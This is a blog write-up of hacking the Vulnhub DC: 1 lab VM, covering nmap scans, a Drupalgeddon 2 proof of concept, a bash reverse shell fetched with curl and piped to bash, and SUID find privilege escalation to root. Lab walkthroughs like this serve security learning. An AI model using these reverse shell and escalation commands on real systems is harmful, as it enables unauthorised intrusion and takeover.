Hacking DC: 1 - Vulnhub

Michael Ikua
3 min readJul 16, 2019


It’s been a while since I wrote, creating this series of me hacking through the DC VMs from Vulnhub should be the perfect opportunity.

I’ll skip the discovering IP part, if you’ve read previous articles it should be pretty straightforward.

Service Enumeration

Running a fast scan on all ports to discover which ports are open.

nmap -sS -p- --min-rate=1000

Now we can deep dive and use nmap scripts to get the versions and some more information on the services running.

nmap -sC -sV -p 22,80,111,52587 -oN DC:1.tcpscan


Drupal 7 is running on Apache based on the nmap output and we can verify that by checking on the browser.

You can also use wappalyzer plugin to get the version of Drupal running as well.

If you’ve come across Drupal before you might have heard of Drupalgeddon.

Fortunately, Drupal 7 is exploitable by Drupalgeddon 2 which exploits the RCE vulnerability. Here’s a good repo that has the PoC to verify this.


This didn’t happen to be vulnerable.


Running the PoC proves the vulnerability and gives the ability for remote code execution.

Getting shell and privilege escalation

The exploit runs as a web shell which is not very ideal, so it’s better to get a reverse shell which runs bash.

I hosted a shell script on my kali with this command:

bash -i >& /dev/tcp/ 0>&1

Then ran on the prompt given by the exploit:

curl | bash

This way I got a reverse shell on nc listening on 9001.

What I like to do after I get shell is run LinEnum to find possible ways to privesc.

Looking through the output, find has it’s SUID bit set.

We can abuse that to get root privileges!

find . -exec /bin/sh \; -quit

Using this find command from gtfobins we get root and read the final flag.


For this VM my goal was just getting root, for future VMs I’ll try to work on some post exploitation and explore more ways to exploit and privesc. This VM is for beginner and exploiting it is straightforward.

Twitter: ikuamike

Github: ikuamike